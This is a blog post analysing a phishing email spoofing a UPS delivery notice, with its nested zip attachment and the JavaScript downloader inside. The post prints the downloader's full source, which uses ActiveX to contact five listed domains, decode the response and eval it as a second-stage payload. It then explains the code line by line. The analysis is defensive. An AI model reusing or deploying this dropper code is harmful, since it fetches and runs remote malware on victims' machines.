Analysis and Takeapart of a UPS Parcel Shipping Problem Spoof

Member for

10 months 3 weeks
Submitted by AlReaud on Tue, 02/28/2017 - 19:26

At least once a week I get attachments from a “reputable” organization saying my account (that I don't have) has been locked due to suspicious activity being detected, a bank account (that I don't have) needs verification, or there is a problem with the shipment of a parcel (I didn't order). This week I got an interesting one from "Jordan Mccabe, UPS Station Manager". Sadly the sending individual doesn't know enough about the target to realize that "UPS" and "Post Office", well, kind of mismatch. But this one got me interested in doing some reverse engineering of the suspicious attachment because of it's small size, only 817 bytes.

The text of the email is as follows:
Date: 02/26/2017 01:35 AM
From: virtual-user <webmaster@lippocastano.it>
Subject: Parcel #001210497 shipment problem, please review
To: Me
Body:

Dear Customer,
Your item has arrived at the UPS Post Office at February 25, but the courier was unable to deliver parcel to you.
Postal label is enclosed to this e-mail. Please check the attachment!
Yours sincerely,
Jordan Mccabe,
UPS Station Manager.

Attachment: UPS-Parcel-ID-001210497.zip
Attachment Checksum (MD5): 3e01923b9fd179c864bf40caffb21786

Screen capture of UPS Trojan Attachment Email showing highlights.

The highlighted areas indicate areas that commonly give away the fact that it is a spoof. Usually the sender address is strange or wrong, the grammar is wrong, and the context of the message is wrong.

Unzipping the attachments creates a second zip file with a .doc.zip extension (Microsoft Word Document.Compressed File) that is 694 bytes long. Most Windows installations will show this as .doc file rather than as it's true extension which is a .zip file.
Unzipped Attachment: UPS-Parcel-ID-001210497.doc.zip
Unzipped Attachment Checksum (MD5): 6a6d2e478e7a2b0259f1fcc333e7cde3

My interpretation is that if one were to double click on that file in a File Explorer window, Windows would actually extract the compressed file and try to execute it with the proper software. But we are doing this on Ubuntu 16.04, so we have to do it manually and make some assumptions that may not be valid. We'll get to that later…

Unzipping the compressed document file gives a third file with a .doc.js extension (Microsoft Word Document.JavaScript Source) that is, again, 817 bytes long. I believe that this JavaScript file would then be executed by the default browser on the system, which would normally be Microsoft Internet Explorer or, now, Microsoft Edge.
Unzipped Document File: UPS-Parcel-ID-001210497.doc.js
Unzipped Document File Checksum (MD5): f1bce6d06683909f54cefd27490c097d

The content of this JavaScript installer is as follows. It is simply encoded in an attempt to defeat malware scanners. For simplicity I've removed blank lines:

  1. var sder = "P";
  2. var g2 = "M"+"sxml2.XMLHT"+""+"T"+""+sder;
  3. var m = "rWsE9ZXQhmXt5qxjCNca4Tq-BPesvEn4nxd0LQzxeVXfY-N-QdlpNfbwmn7_EZjSl61XGNgm";
  4. var x = new Array("ronniespersonaltouchjanitorialservice.com", "lasvegasmaps.net", "fitnessdigezt.com", "lovingfloridalife.com", "gestionysuministros.com");
  5. var t4 = "ht"+"tp";
  6. var mul = "qwadro";
  7. var ter = "/";
  8. for (var i=0; i<x.length; i++)
  9. {   
  10.     var vDJmB = function(){
  11.         return new ActiveXObject(g2);
  12.     }();
  13.     var e = vDJmB;
  14.     try
  15.     {       
  16.         var guama=["\x6F\x70\x65\x6E"];e[guama[0]]("G"+""+"E"+"T", t4 + ":"+ter+ter+x[i]+"/c"+"o"+"unter/?"+m,false)       
  17.         e.send();
  18.         var r = e.responseText;
  19.         if (r.length > 999+1 && r.indexOf(m) > -1)
  20.         {
  21.             eval(e.responseText.split(m).join(mul.substring(2,3)));
  22.             break;
  23.         };
  24.     }
  25.     catch(e)
  26.     {
  27.     };
  28. };

 

The JavaScript goes out to five websites and downloads encoded preliminary payloads that are using something similar to steganography for obfuscation purposes. After configuring variables, the script creates an ActiveX object, vDJmB (line 10), assigns it to a variable, e (line 13), then tries to open the ActiveX object with the parameters shown in (line 16). The five sites listed for this version are in array variable x (line 4), and the key is in variable m (line 3). If successful, the script assigns the response to a variable, r (line 18), checks it's size, and then evaluates the decoded primary payload (line 21), which is also JavaScript.

TO BE CONTINUED…

Add new comment

The content of this field is kept private and will not be shown publicly.

Restricted HTML

  • Allowed HTML tags: <a href hreflang> <em> <strong> <cite> <blockquote cite> <code> <ul type> <ol type start> <li> <dl> <dt> <dd> <h2 id> <h3 id> <h4 id> <h5 id> <h6 id> <u> <s> <sup> <sub> <hr>
  • Lines and paragraphs break automatically.
  • Web page addresses and email addresses turn into links automatically.
Image CAPTCHA
Enter the characters shown in the image.